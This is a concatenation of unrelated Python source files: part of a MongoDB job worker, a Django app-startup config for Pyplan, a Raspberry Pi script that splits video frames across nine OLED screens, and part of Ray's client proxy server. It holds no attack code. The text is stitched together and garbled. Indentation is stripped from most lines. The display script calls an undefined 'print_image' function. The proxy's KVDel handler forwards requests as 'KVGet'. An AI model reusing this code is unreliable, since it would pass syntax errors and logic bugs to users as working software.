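    # document, e.g. with the worker collection handle:
    #   workers.update({'_id': worker_id},
    #                  {'$set': {'terminate': True, 'terminate_status': 1}})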
def work(self, one=False, batch=False, failed=False, fail_fast=False):
'''
Main work function
        :param one: wait for the first job, execute it, and then exit
:param batch: work until the queue is empty, then exit
'''
with self.register():
try:
self.start_main_loop(one, batch, failed, fail_fast)
except KeyboardInterrupt:
self.logger.exception(None)
if not self._current:
return
self.logger.warn('Warm shutdown requested')
proc, job = self._current
proc.join(timeout=job.doc.get('timeout'))
return
def pop_item(self, pop_failed=False):
job = self.factory.pop_item(worker_id=self.worker_id,
queues=self.queues,
tags=self.tags,
failed=pop_failed,
)
return job
def start_main_loop(self, one=False, batch=False, pop_failed=False, fail_fast=False, max_retries=10):
'''
Start the main loop and process jobs
'''
self.logger.info('Starting Main Loop mongo-host=%s mongo-db=%s' % (self.factory.db.connection.host,
self.factory.db.name))
self.logger.info('Starting Main Loop worker=%s _id=%s' % (self.name, self.worker_id))
self.logger.info('Listening for jobs queues=[%s] tags=[%s]' % (', '.join(self.queues), ', '.join(self.tags)))
retries = 0
while 1:
try:
should_exit, status = self.check_in()
if should_exit:
self.logger.info("Shutdown Requested (from DB)")
raise SystemExit(status)
job = self.pop_item(pop_failed=pop_failed)
if job is None:
if batch: break
time.sleep(self.poll_interval)
continue
self.process_job(job)
if one: break
self.logger.info('Listening for jobs queues=[%s] tags=[%s]' % (', '.join(self.queues), ', '.join(self.tags)))
retries = 0
# Handle connection errors
except ConnectionFailure as err:
if fail_fast:
raise
elif (retries == max_retries):
self.logger.exception('Retry limit reached (%d)', max_retries)
raise
elif retries < max_retries:
retries += 1
self.logger.exception(err)
sleep_time = ((2 ** retries) + random.random()) * 0.1
self.logger.warn('Retrying in %.2f seconds', sleep_time)
time.sleep(sleep_time)
else:
self.logger.exception(err)
if one:
break
except Exception as err:
if fail_fast:
raise
else:
self.logger.exception(err)
if one:
break
self.logger.info('Exiting Main Loop')
def process_job(self, job):
'''
Process a single job in a multiprocessing.Process
'''
self.logger.info('Popped Job _id=%s queue=%s tags=%s' % (job.id, job.qname, ', '.join(job.tags)))
self.logger.info(job.call_str)
proc = Process(target=self._process_job, args=(job,))
self._current = proc, job
proc.start()
timeout = job.doc.get('timeout')
if timeout:
self.logger.info("Job started, timing out after %s seconds" % timeout)
else:
self.logger.info("Job started, no time out")
proc.join(timeout=job.doc.get('timeout'))
if proc.is_alive():
self.logger.error('Timeout occurred: interrupting job')
os.kill(proc.pid, signal.SIGALRM)
# Give the process 2 min to finish
proc.join(timeout=min(job.doc.get('timeout'), 2 * 60))
if proc.is_alive():
self.logger.error('Process did not shut down after interrupt: terminating job')
proc.terminate()
self._current = None
failed = proc.exitcode != 0
if failed:
self.logger.error('Job %s failed' % (job.doc['_id']))
else:
self.logger.info('Job %s finished successfully' % (job.doc['_id']))
job.set_finished(failed)
return failed
def _process_job(self, job):
        '''
        Execute a single job; runs as the target of the worker subprocess.
        '''
handle_signals()
with setup_logging(self.factory.logging_collection, job.id):
try:
self._pre(job)
job.apply()
except:
if self._handler:
exc_type, exc_value, traceback = sys.exc_info()
self._handler(job, exc_type, exc_value, traceback)
raise
finally:
self._post(job)
def _pre(self, job):
if self._pre_call: self._pre_call(job)
def _post(self, job):
if self._post_call: self._post_call(job)
def set_pre(self, func):
self._pre_call = func
def set_post(self, func):
self._post_call = func
def push_exception_handler(self, handler):
self._handler = handler
@property
def num_backlog(self):
'number of tasks this worker has to complete'
return self.factory._items_cursor(queues=self.queues,
tags=self.tags,
).count()
class WorkerProxy(object):
'This is a representation of an actual worker process'
def __init__(self, factory, doc):
self.factory = factory
self.doc = doc
@property
def id(self):
return self.doc['_id']
@property
def name(self):
return self.doc['name']
@property
def qnames(self):
return self.doc.get('queues', ())
@property
def tags(self):
return self.doc['tags']
@property
def num_processed(self):
'number of tasks this worker has completed'
collection = self.factory.queue_collection
return collection.find({'worker_id': self.id}).count()
@property
def num_backlog(self):
'number of tasks this worker has to complete'
return self.factory._items_cursor(queues=self.qnames,
tags=self.tags,
).count()
@property
def last_check_in(self):
'last check in time'
return self.doc.get('check-in', nulltime())
def stream(self):
collection = self.factory.logging_collection
return MongoStream(collection,
doc={'worker_id': self.id},
finished=self.finished)
def finished(self):
'test if this worker is finished'
coll = self.factory.worker_collection
cursor = coll.find({'_id': self.id, 'working': False})
return bool(cursor.count())
|
config.py
|
import sys
import webbrowser
from os.path import exists, join
from shutil import copyfile, copytree
from threading import Thread
from time import sleep
from django.apps import AppConfig
from django.conf import settings
from requests import get as requests_get
class PyplanAppConfig(AppConfig):
name = 'pyplan.pyplan'
verbose_name = "Pyplan API"
def ready(self):
# TODO: if desktop_mode ?
try:
from django.contrib.sessions.models import Session
Session.objects.all().delete()
except:
pass
print('Pyplan is ready')
try:
# Check if the user has demo models
examples_folder = join(settings.MEDIA_ROOT, 'models', 'Examples')
if not exists(examples_folder):
copytree(join(settings.BACKEND_DIR, 'demos', 'Examples'),
examples_folder)
tutorials_folder = join(settings.MEDIA_ROOT, 'models', 'Tutorials')
if not exists(tutorials_folder):
copytree(join(settings.BACKEND_DIR, 'demos', 'Tutorials'),
tutorials_folder)
home_file = join(settings.MEDIA_ROOT, 'models', 'home.json')
if not exists(home_file):
copyfile(join(settings.BACKEND_DIR, 'demos', 'home.json'),
home_file)
except Exception as ex:
print(ex)
try:
port = str(sys.argv[1])
def _wait_for_ready(retries):
response = None
try:
response = requests_get(
f'http://localhost:{port}/api/healthcheck/')
except:
pass
finally:
                if response is not None and response.status_code == 200:
webbrowser.open(f'http://localhost:{port}', new=2)
else:
if retries < 40:
sleep(1)
_wait_for_ready(retries+1)
else:
print("Open the browser and go to http://localhost:9740")
waiter = Thread(target=_wait_for_ready, args=(1,))
waiter.start()
except Exception as ex:
print(ex)
print("Open the browser and go to http://localhost:9740")
|
display_Run.py
|
import cv2
import _thread
import time
import multiprocessing as mp
from luma.core.interface.serial import i2c
from luma.core.render import canvas
from luma.oled.device import ssd1306, ssd1325, ssd1331, sh1106
from time import sleep
from PIL import Image
cap = cv2.VideoCapture('/home/pi/Downloads/videoplayback.mp4')
n_rows = 3
n_images_per_row = 3
width = 384
height = 192
dim = (width, height)
serial9 = i2c(port=11, address=0x3C)
device9 = ssd1306(serial9)
serial8 = i2c(port=10, address=0x3C)
device8 = ssd1306(serial8)
serial7 = i2c(port=9, address=0x3C)
device7 = ssd1306(serial7)
serial6 = i2c(port=8, address=0x3C)
device6 = ssd1306(serial6)
serial5 = i2c(port=7, address=0x3C)
device5 = ssd1306(serial5)
serial4 = i2c(port=6, address=0x3C)
device4 = ssd1306(serial4)
serial3 = i2c(port=5, address=0x3C)
device3 = ssd1306(serial3)
serial2 = i2c(port=4, address=0x3C)
device2 = ssd1306(serial2)
serial1 = i2c(port=3, address=0x3C)
device1 = ssd1306(serial1)
def print_Image(image,device):
device.display(image)
#print("print image1")
def print_Image2(image,device):
device.display(image)
#print("print image2")
def print_Image3(image,device):
device.display(image)
#print("print image3")
def print_Image4(image,device):
device.display(image)
#print("print image4")
def print_Image5(image,device):
device.display(image)
def print_Image6(image,device):
device.display(image)
def print_Image7(image,device):
device.display(image)
def print_Image8(image,device):
device.display(image)
def print_Image9(image,device):
device.display(image)
'''def process_1(image,device4,image2,device3):
print("Process1_called")
#device4.display(image)
#device3.display(image2)
_thread.start_new_thread(print_Image, (image,device4),)
_thread.start_new_thread(print_Image2, (image2,device3),)
def process_2(image3,device2,image4,device1):
print("Process2_called")
#device2.display(image3)
#device1.display(image4)
_thread.start_new_thread(print_Image3, (image3,device2),)
_thread.start_new_thread(print_Image4, (image4,device1),)
'''
while True:
    start_time = time.time()
    ret, frame = cap.read()
    if not ret:  # end of video or read failure
        break
    frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    frame = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA)
height, width = frame.shape
roi_height = int(height / n_rows)
roi_width = int(width / n_images_per_row)
images = []
for x in range(0, n_rows):
for y in range(0, n_images_per_row):
tmp_image=frame[x*roi_height:(x+1)*roi_height, y*roi_width:(y+1)*roi_width]
images.append(tmp_image)
#Display image
for x in range(0, n_rows):
for y in range(0, n_images_per_row):
cv2.imshow(str(x*n_images_per_row+y+1),images[x*n_images_per_row+y])
cv2.moveWindow(str(x*n_images_per_row+y+1), 100+(y*roi_width), 50+(x*roi_height))
image = Image.fromarray(images[0]).convert('1')
image2 = Image.fromarray(images[1]).convert('1')
image3 = Image.fromarray(images[2]).convert('1')
image4 = Image.fromarray(images[3]).convert('1')
image5 = Image.fromarray(images[4]).convert('1')
image6 = Image.fromarray(images[5]).convert('1')
image7 = Image.fromarray(images[6]).convert('1')
image8 = Image.fromarray(images[7]).convert('1')
image9 = Image.fromarray(images[8]).convert('1')
time.sleep(.155)
    _thread.start_new_thread(print_image, (image, device9),)
    _thread.start_new_thread(print_image, (image2, device8),)
    _thread.start_new_thread(print_image, (image3, device7),)
    _thread.start_new_thread(print_image, (image4, device6),)
    _thread.start_new_thread(print_image, (image5, device5),)
    _thread.start_new_thread(print_image, (image6, device4),)
    _thread.start_new_thread(print_image, (image7, device3),)
    _thread.start_new_thread(print_image, (image8, device2),)
    _thread.start_new_thread(print_image, (image9, device1),)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
print(time.time()-start_time)
cap.release()
cv2.destroyAllWindows()
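
# A standalone sketch of the 3x3 tiling step used in the loop above: split one
# grayscale frame into n_rows * n_cols equally sized tiles. It relies only on
# numpy, so the geometry can be sanity-checked without a camera or the OLED
# hardware attached; the helper name and shapes are illustrative assumptions.
import numpy as np

def split_into_tiles(frame, n_rows=3, n_cols=3):
    h, w = frame.shape
    tile_h, tile_w = h // n_rows, w // n_cols
    return [frame[r * tile_h:(r + 1) * tile_h, c * tile_w:(c + 1) * tile_w]
            for r in range(n_rows) for c in range(n_cols)]

tiles = split_into_tiles(np.zeros((192, 384), dtype=np.uint8))
assert len(tiles) == 9 and tiles[0].shape == (64, 128)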
|
proxier.py
|
import atexit
from concurrent import futures
from dataclasses import dataclass
import grpc
import logging
from itertools import chain
import json
import socket
import sys
from threading import Event, Lock, Thread, RLock
import time
import traceback
from typing import Callable, Dict, List, Optional, Tuple
import ray
from ray.cloudpickle.compat import pickle
from ray.job_config import JobConfig
import ray.core.generated.agent_manager_pb2 as agent_manager_pb2
import ray.core.generated.ray_client_pb2 as ray_client_pb2
import ray.core.generated.ray_client_pb2_grpc as ray_client_pb2_grpc
import ray.core.generated.runtime_env_agent_pb2 as runtime_env_agent_pb2
import ray.core.generated.runtime_env_agent_pb2_grpc as runtime_env_agent_pb2_grpc # noqa: E501
from ray.util.client.common import (
_get_client_id_from_context,
ClientServerHandle,
CLIENT_SERVER_MAX_THREADS,
GRPC_OPTIONS,
_propagate_error_in_context,
)
from ray.util.client.server.dataservicer import _get_reconnecting_from_context
from ray._private.client_mode_hook import disable_client_hook
from ray._private.parameter import RayParams
from ray._private.runtime_env.context import RuntimeEnvContext
from ray._private.services import ProcessInfo, start_ray_client_server
from ray._private.tls_utils import add_port_to_grpc_server
from ray._private.gcs_utils import GcsClient, use_gcs_for_bootstrap
from ray._private.utils import detect_fate_sharing_support
# Import psutil after ray so the packaged version is used.
import psutil
logger = logging.getLogger(__name__)
CHECK_PROCESS_INTERVAL_S = 30
MIN_SPECIFIC_SERVER_PORT = 23000
MAX_SPECIFIC_SERVER_PORT = 24000
CHECK_CHANNEL_TIMEOUT_S = 30
LOGSTREAM_RETRIES = 5
LOGSTREAM_RETRY_INTERVAL_SEC = 2
@dataclass
class SpecificServer:
port: int
process_handle_future: futures.Future
channel: "grpc._channel.Channel"
def is_ready(self) -> bool:
"""Check if the server is ready or not (doesn't block)."""
return self.process_handle_future.done()
def wait_ready(self, timeout: Optional[float] = None) -> None:
"""
Wait for the server to actually start up.
"""
res = self.process_handle_future.result(timeout=timeout)
if res is None:
            # This is only set to None when server creation specifically fails.
raise RuntimeError("Server startup failed.")
def poll(self) -> Optional[int]:
"""Check if the process has exited."""
try:
proc = self.process_handle_future.result(timeout=0.1)
if proc is not None:
return proc.process.poll()
except futures.TimeoutError:
return
def kill(self) -> None:
"""Try to send a KILL signal to the process."""
try:
proc = self.process_handle_future.result(timeout=0.1)
if proc is not None:
proc.process.kill()
except futures.TimeoutError:
# Server has not been started yet.
pass
def set_result(self, proc: Optional[ProcessInfo]) -> None:
"""Set the result of the internal future if it is currently unset."""
if not self.is_ready():
self.process_handle_future.set_result(proc)
def _match_running_client_server(command: List[str]) -> bool:
"""
Detects if the main process in the given command is the RayClient Server.
    This works by ensuring that the first three arguments are similar to:
<python> -m ray.util.client.server
"""
flattened = " ".join(command)
rejoined = flattened.split()
if len(rejoined) < 3:
return False
return rejoined[1:3] == ["-m", "ray.util.client.server"]
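# Illustrative behaviour of the matcher above (the examples are assumptions,
# not from the original module):
#
#     >>> _match_running_client_server(
#     ...     ["/usr/bin/python", "-m", "ray.util.client.server", "--port=23000"])
#     True
#     >>> _match_running_client_server(["/usr/bin/python", "train.py"])
#     False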
class ProxyManager:
def __init__(
self,
address: Optional[str],
*,
session_dir: Optional[str] = None,
redis_password: Optional[str] = None,
runtime_env_agent_port: int = 0,
):
self.servers: Dict[str, SpecificServer] = dict()
self.server_lock = RLock()
self._address = address
self._redis_password = redis_password
self._free_ports: List[int] = list(
range(MIN_SPECIFIC_SERVER_PORT, MAX_SPECIFIC_SERVER_PORT)
)
self._runtime_env_channel = ray._private.utils.init_grpc_channel(
f"127.0.0.1:{runtime_env_agent_port}"
)
self._runtime_env_stub = (
runtime_env_agent_pb2_grpc.RuntimeEnvServiceStub( # noqa: E501
self._runtime_env_channel
)
)
self._check_thread = Thread(target=self._check_processes, daemon=True)
self._check_thread.start()
self.fate_share = bool(detect_fate_sharing_support())
self._node: Optional[ray.node.Node] = None
atexit.register(self._cleanup)
def _get_unused_port(self) -> int:
"""
Search for a port in _free_ports that is unused.
"""
with self.server_lock:
num_ports = len(self._free_ports)
for _ in range(num_ports):
port = self._free_ports.pop(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind(("", port))
except OSError:
self._free_ports.append(port)
continue
finally:
s.close()
return port
raise RuntimeError("Unable to succeed in selecting a random port.")
@property
def address(self) -> str:
"""
Returns the provided Ray bootstrap address, or creates a new cluster.
"""
if self._address:
return self._address
# Start a new, locally scoped cluster.
connection_tuple = ray.init()
self._address = connection_tuple["address"]
self._session_dir = connection_tuple["session_dir"]
return self._address
@property
def node(self) -> ray.node.Node:
"""Gets a 'ray.Node' object for this node (the head node).
If it does not already exist, one is created using the bootstrap
address.
"""
if self._node:
return self._node
if use_gcs_for_bootstrap():
ray_params = RayParams(gcs_address=self.address)
else:
ray_params = RayParams(redis_address=self.address)
if self._redis_password:
ray_params.redis_password = self._redis_password
self._node = ray.node.Node(
ray_params,
head=False,
shutdown_at_exit=False,
spawn_reaper=False,
connect_only=True,
)
return self._node
def create_specific_server(self, client_id: str) -> SpecificServer:
"""
Create, but not start a SpecificServer for a given client. This
method must be called once per client.
"""
with self.server_lock:
assert (
self.servers.get(client_id) is None
), f"Server already created for Client: {client_id}"
port = self._get_unused_port()
server = SpecificServer(
port=port,
process_handle_future=futures.Future(),
channel=ray._private.utils.init_grpc_channel(
f"127.0.0.1:{port}", options=GRPC_OPTIONS
),
)
self.servers[client_id] = server
return server
def _create_runtime_env(
self, serialized_runtime_env: str, specific_server: SpecificServer
):
"""Creates the runtime_env by sending an RPC to the agent.
Includes retry logic to handle the case when the agent is
temporarily unreachable (e.g., hasn't been started up yet).
"""
create_env_request = runtime_env_agent_pb2.CreateRuntimeEnvRequest(
serialized_runtime_env=serialized_runtime_env,
job_id=f"ray_client_server_{specific_server.port}".encode("utf-8"),
)
retries = 0
max_retries = 5
wait_time_s = 0.5
while retries <= max_retries:
try:
r = self._runtime_env_stub.CreateRuntimeEnv(create_env_request)
if r.status == agent_manager_pb2.AgentRpcStatus.AGENT_RPC_STATUS_OK:
return r.serialized_runtime_env_context
elif (
r.status == agent_manager_pb2.AgentRpcStatus.AGENT_RPC_STATUS_FAILED
):
raise RuntimeError(
"Failed to create runtime_env for Ray client "
f"server, it is caused by:\n{r.error_message}"
)
else:
assert False, f"Unknown status: {r.status}."
except grpc.RpcError as e:
# Whitelist of errors we consider transient.
# NOTE(edoakes): we can get UNIMPLEMENTED while the server
# starts up because the agent runs multiple gRPC services
# on the same port.
if e.code() not in [
grpc.StatusCode.UNAVAILABLE,
grpc.StatusCode.UNIMPLEMENTED,
]:
raise e
logger.warning(
f"CreateRuntimeEnv request failed: {e}. "
f"Retrying after {wait_time_s}s. "
f"{max_retries-retries} retries remaining."
)
# Exponential backoff.
time.sleep(wait_time_s)
retries += 1
wait_time_s *= 2
raise TimeoutError(
f"CreateRuntimeEnv request failed after {max_retries} attempts."
)
def start_specific_server(self, client_id: str, job_config: JobConfig) -> bool:
"""
Start up a RayClient Server for an incoming client to
communicate with. Returns whether creation was successful.
"""
specific_server = self._get_server_for_client(client_id)
assert specific_server, f"Server has not been created for: {client_id}"
output, error = self.node.get_log_file_handles(
f"ray_client_server_{specific_server.port}", unique=True
)
serialized_runtime_env = job_config.get_serialized_runtime_env()
if not serialized_runtime_env or serialized_runtime_env == "{}":
# TODO(edoakes): can we just remove this case and always send it
# to the agent?
serialized_runtime_env_context = RuntimeEnvContext().serialize()
else:
serialized_runtime_env_context = self._create_runtime_env(
serialized_runtime_env=serialized_runtime_env,
specific_server=specific_server,
)
proc = start_ray_client_server(
self.address,
self.node.node_ip_address,
specific_server.port,
stdout_file=output,
stderr_file=error,
fate_share=self.fate_share,
server_type="specific-server",
serialized_runtime_env_context=serialized_runtime_env_context,
redis_password=self._redis_password,
)
        # Wait for the process being run to transition from the shim process
        # to the actual RayClient Server.
pid = proc.process.pid
if sys.platform != "win32":
psutil_proc = psutil.Process(pid)
else:
psutil_proc = None
# Don't use `psutil` on Win32
while psutil_proc is not None:
if proc.process.poll() is not None:
logger.error(f"SpecificServer startup failed for client: {client_id}")
break
cmd = psutil_proc.cmdline()
if _match_running_client_server(cmd):
break
logger.debug("Waiting for Process to reach the actual client server.")
time.sleep(0.5)
specific_server.set_result(proc)
logger.info(
f"SpecificServer started on port: {specific_server.port} "
f"with PID: {pid} for client: {client_id}"
)
return proc.process.poll() is None
def _get_server_for_client(self, client_id: str) -> Optional[SpecificServer]:
with self.server_lock:
client = self.servers.get(client_id)
if client is None:
logger.error(f"Unable to find channel for client: {client_id}")
return client
def has_channel(self, client_id: str) -> bool:
server = self._get_server_for_client(client_id)
if server is None:
return False
return server.is_ready()
def get_channel(
self,
client_id: str,
) -> Optional["grpc._channel.Channel"]:
"""
Find the gRPC Channel for the given client_id. This will block until
the server process has started.
"""
server = self._get_server_for_client(client_id)
if server is None:
return None
# Wait for the SpecificServer to become ready.
server.wait_ready()
try:
grpc.channel_ready_future(server.channel).result(
timeout=CHECK_CHANNEL_TIMEOUT_S
)
return server.channel
except grpc.FutureTimeoutError:
logger.exception(f"Timeout waiting for channel for {client_id}")
return None
def _check_processes(self):
"""
Keeps the internal servers dictionary up-to-date with running servers.
"""
while True:
with self.server_lock:
for client_id, specific_server in list(self.servers.items()):
if specific_server.poll() is not None:
logger.info(
f"Specific server {client_id} is no longer running"
f", freeing its port {specific_server.port}"
)
del self.servers[client_id]
# Port is available to use again.
self._free_ports.append(specific_server.port)
time.sleep(CHECK_PROCESS_INTERVAL_S)
def _cleanup(self) -> None:
"""
Forcibly kill all spawned RayClient Servers. This ensures cleanup
for platforms where fate sharing is not supported.
"""
for server in self.servers.values():
server.kill()
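# A standalone sketch of the retry-with-exponential-backoff shape that
# _create_runtime_env follows. `do_rpc` and `is_transient` are illustrative
# placeholders, not names from this module.
def _retry_with_backoff(do_rpc, is_transient, max_retries=5, wait_time_s=0.5):
    for attempt in range(max_retries + 1):
        try:
            return do_rpc()
        except Exception as e:
            # Give up on non-transient errors or once the retry budget is spent.
            if not is_transient(e) or attempt == max_retries:
                raise
        time.sleep(wait_time_s)
        wait_time_s *= 2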
class RayletServicerProxy(ray_client_pb2_grpc.RayletDriverServicer):
def __init__(self, ray_connect_handler: Callable, proxy_manager: ProxyManager):
self.proxy_manager = proxy_manager
self.ray_connect_handler = ray_connect_handler
def _call_inner_function(
self, request, context, method: str
) -> Optional[ray_client_pb2_grpc.RayletDriverStub]:
client_id = _get_client_id_from_context(context)
chan = self.proxy_manager.get_channel(client_id)
if not chan:
logger.error(f"Channel for Client: {client_id} not found!")
context.set_code(grpc.StatusCode.NOT_FOUND)
return None
stub = ray_client_pb2_grpc.RayletDriverStub(chan)
try:
metadata = [("client_id", client_id)]
if context:
metadata = context.invocation_metadata()
return getattr(stub, method)(request, metadata=metadata)
except Exception as e:
# Error while proxying -- propagate the error's context to user
logger.exception(f"Proxying call to {method} failed!")
_propagate_error_in_context(e, context)
def _has_channel_for_request(self, context):
client_id = _get_client_id_from_context(context)
return self.proxy_manager.has_channel(client_id)
def Init(self, request, context=None) -> ray_client_pb2.InitResponse:
return self._call_inner_function(request, context, "Init")
def KVPut(self, request, context=None) -> ray_client_pb2.KVPutResponse:
"""Proxies internal_kv.put.
This is used by the working_dir code to upload to the GCS before
ray.init is called. In that case (if we don't have a server yet)
we directly make the internal KV call from the proxier.
Otherwise, we proxy the call to the downstream server as usual.
"""
if self._has_channel_for_request(context):
return self._call_inner_function(request, context, "KVPut")
with disable_client_hook():
already_exists = ray.experimental.internal_kv._internal_kv_put(
request.key, request.value, overwrite=request.overwrite
)
return ray_client_pb2.KVPutResponse(already_exists=already_exists)
def KVGet(self, request, context=None) -> ray_client_pb2.KVGetResponse:
"""Proxies internal_kv.get.
This is used by the working_dir code to upload to the GCS before
ray.init is called. In that case (if we don't have a server yet)
we directly make the internal KV call from the proxier.
Otherwise, we proxy the call to the downstream server as usual.
"""
if self._has_channel_for_request(context):
return self._call_inner_function(request, context, "KVGet")
with disable_client_hook():
value = ray.experimental.internal_kv._internal_kv_get(request.key)
return ray_client_pb2.KVGetResponse(value=value)
def KVDel(self, request, context=None) -> ray_client_pb2.KVDelResponse:
"""Proxies internal_kv.delete.
This is used by the working_dir code to upload to the GCS before
ray.init is called. In that case (if we don't have a server yet)
we directly make the internal KV call from the proxier.
Otherwise, we proxy the call to the downstream server as usual.
"""
if self._has_channel_for_request(context):
return self._call_inner_function(request, context, "KVGet")
with disable_client_hook():
ray.experimental.internal_kv._internal_kv_del(request.key)
return ray_client_pb2.KVDelResponse()
def KVList(self, request, context=None) -> ray_client_pb2.KVListResponse:
"""Proxies internal_kv.list.
This is used by the working_dir code to upload to the GCS before
ray.init is called. In that case (if we don't have a server yet)
we directly make the internal KV call from the proxier.
Otherwise, we proxy the call to the downstream server as usual.
"""
if self._has_channel_for_request(context):
return self._call_inner_function(request, context, "KVList")
with disable_client_hook():
keys = ray.experimental.internal_kv._internal_kv_list(request.prefix)
return ray_client_pb2.KVListResponse(keys=keys)
def KVExists(self, request, context=None) -> ray_client_pb2.KVExistsResponse:
"""Proxies internal_kv.exists.
This is used by the working_dir code to upload to the GCS before
ray.init is called. In that case (if we don't have a server yet)
we directly make the internal KV call from the proxier.
Otherwise, we proxy the call to the downstream server as usual.
"""
if self._has_channel_for_request(context):
return self._call_inner_function(request, context, "KVExists")
with disable_client_hook():
exists = ray.experimental.internal_kv._internal_kv_exists(request.key)
return ray_client_pb2.KVExistsResponse(exists=exists)
def ListNamedActors(
self, request, context=None
) -> ray_client_pb2.ClientListNamedActorsResponse:
return self._call_inner_function(request, context, "ListNamedActors")
def ClusterInfo(self, request, context=None) -> ray_client_pb2.ClusterInfoResponse:
# NOTE: We need to respond to the PING request here to allow the client
# to continue with connecting.
if request.type == ray_client_pb2.ClusterInfoType.PING:
resp = ray_client_pb2.ClusterInfoResponse(json=json.dumps({}))
return resp
return self._call_inner_function(request, context, "ClusterInfo")
def Terminate(self, req, context=None):
return self._call_inner_function(req, context, "Terminate")
def GetObject(self, request, context=None):
return self._call_inner_function(request, context, "GetObject")
def PutObject(
self, request: ray_client_pb2.PutRequest, context=None
) -> ray_client_pb2.PutResponse:
return self._call_inner_function(request, context, "PutObject")
def WaitObject(self, request, context=None) -> ray_client_pb2.WaitResponse:
return self._call_inner_function(request, context, "WaitObject")
def Schedule(self, task, context=None) -> ray_client_pb2.ClientTaskTicket:
return self._call_inner_function(task, context, "Schedule")
def ray_client_server_env_prep(job_config: JobConfig) -> JobConfig:
return job_config
def prepare_runtime_init_req(
init_request: ray_client_pb2.DataRequest,
) -> Tuple[ray_client_pb2.DataRequest, JobConfig]:
"""
Extract JobConfig and possibly mutate InitRequest before it is passed to
the specific RayClient Server.
"""
init_type = init_request.WhichOneof("type")
assert init_type == "init", (
"Received initial message of type " f"{init_type}, not 'init'."
)
req = init_request.init
job_config = JobConfig()
if req.job_config:
job_config = pickle.loads(req.job_config)
new_job_config = ray_client_server_env_prep(job_config)
modified_init_req = ray_client_pb2.InitRequest(
job_config=pickle.dumps(new_job_config),
ray_init_kwargs=init_request.init.ray_init_kwargs,
reconnect_grace_period=init_request.init.reconnect_grace_period,
)
init_request.init.CopyFrom(modified_init_req)
return (init_request, new_job_config)
class DataServicerProxy(ray_client_pb2_grpc.RayletDataStreamerServicer):
def __init__(self, proxy_manager: ProxyManager):
self.num_clients = 0
# dictionary mapping client_id's to the last time they connected
self.clients_last_seen: Dict[str, float] = {}
self.reconnect_grace_periods: Dict[str, float] = {}
self.clients_lock = Lock()
self.proxy_manager = proxy_manager
self.stopped = Event()
def modify_connection_info_resp(
self, init_resp: ray_client_pb2.DataResponse
) -> ray_client_pb2.DataResponse:
"""
        Modify the `num_clients` returned in the ConnectionInfoResponse because
individual SpecificServers only have **one** client.
"""
init_type = init_resp.WhichOneof("type")
if init_type != "connection_info":
return init_resp
modified_resp = ray_client_pb2.DataResponse()
modified_resp.CopyFrom(init_resp)
with self.clients_lock:
modified_resp.connection_info.num_clients = self.num_clients
return modified_resp
def Datapath(self, request_iterator, context):
cleanup_requested = False
start_time = time.time()
client_id = _get_client_id_from_context(context)
if client_id == "":
return
reconnecting = _get_reconnecting_from_context(context)
if reconnecting:
with self.clients_lock:
if client_id not in self.clients_last_seen:
# Client took too long to reconnect, session has already
# been cleaned up
context.set_code(grpc.StatusCode.NOT_FOUND)
context.set_details(
"Attempted to reconnect a session that has already "
"been cleaned up"
)
return
self.clients_last_seen[client_id] = start_time
server = self.proxy_manager._get_server_for_client(client_id)
channel = self.proxy_manager.get_channel(client_id)
# iterator doesn't need modification on reconnect
new_iter = request_iterator
else:
# Create Placeholder *before* reading the first request.
server = self.proxy_manager.create_specific_server(client_id)
with self.clients_lock:
self.clients_last_seen[client_id] = start_time
self.num_clients += 1
try:
if not reconnecting:
logger.info(f"New data connection from client {client_id}: ")
init_req = next(request_iterator)
with self.clients_lock:
self.reconnect_grace_periods[
client_id
] = init_req.init.reconnect_grace_period
try:
modified_init_req, job_config = prepare_runtime_init_req(init_req)
if not self.proxy_manager.start_specific_server(
client_id, job_config
):
logger.error(
f"Server startup failed for client: {client_id}, "
f"using JobConfig: {job_config}!"
)
raise RuntimeError(
"Starting Ray client server failed. See "
f"ray_client_server_{server.port}.err for "
"detailed logs."
)
channel = self.proxy_manager.get_channel(client_id)
if channel is None:
logger.error(f"Channel not found for {client_id}")
raise RuntimeError(
"Proxy failed to Connect to backend! Check "
"`ray_client_server.err` and "
f"`ray_client_server_{server.port}.err` on the "
"head node of the cluster for the relevant logs. "
"By default these are located at "
"/tmp/ray/session_latest/logs."
)
except Exception:
init_resp = ray_client_pb2.DataResponse(
init=ray_client_pb2.InitResponse(
ok=False, msg=traceback.format_exc()
)
)
init_resp.req_id = init_req.req_id
yield init_resp
return None
new_iter = chain([modified_init_req], request_iterator)
stub = ray_client_pb2_grpc.RayletDataStreamerStub(channel)
metadata = [("client_id", client_id), ("reconnecting", str(reconnecting))]
resp_stream = stub.Datapath(new_iter, metadata=metadata)
for resp in resp_stream:
resp_type = resp.WhichOneof("type")
if resp_type == "connection_cleanup":
# Specific server is skipping cleanup, proxier should too
cleanup_requested = True
yield self.modify_connection_info_resp(resp)
except Exception as e:
logger.exception("Proxying Datapath failed!")
            # Propagate error through context
recoverable = _propagate_error_in_context(e, context)
if not recoverable:
# Client shouldn't attempt to recover, clean up connection
cleanup_requested = True
finally:
cleanup_delay = self.reconnect_grace_periods.get(client_id)
if not cleanup_requested and cleanup_delay is not None:
# Delay cleanup, since client may attempt a reconnect
# Wait on stopped event in case the server closes and we
# can clean up earlier
self.stopped.wait(timeout=cleanup_delay)
with self.clients_lock:
if client_id not in self.clients_last_seen:
logger.info(f"{client_id} not found. Skipping clean up.")
# Connection has already been cleaned up
return
last_seen = self.clients_last_seen[client_id]
logger.info(
f"{client_id} last started stream at {last_seen}. Current "
f"stream started at {start_time}."
)
if last_seen > start_time:
logger.info("Client reconnected. Skipping cleanup.")
# Client has reconnected, don't clean up
return
logger.debug(f"Client detached: {client_id}")
self.num_clients -= 1
del self.clients_last_seen[client_id]
if client_id in self.reconnect_grace_periods:
del self.reconnect_grace_periods[client_id]
server.set_result(None)
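# The reconnect-aware cleanup rule in Datapath, reduced to one predicate: a
# finished stream cleans up its client only if no newer stream for the same
# client has started since. The helper name is an assumption for illustration.
def _should_cleanup(last_seen: float, this_stream_started: float) -> bool:
    return last_seen <= this_stream_started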
class LogstreamServicerProxy(ray_client_pb2_grpc.RayletLogStreamerServicer):
def __init__(self, proxy_manager: ProxyManager):
super().__init__()
self.proxy_manager = proxy_manager
def Logstream(self, request_iterator, context):
client_id = _get_client_id_from_context(context)
if client_id == "":
return
logger.debug(f"New logstream connection from client {client_id}: ")
channel = None
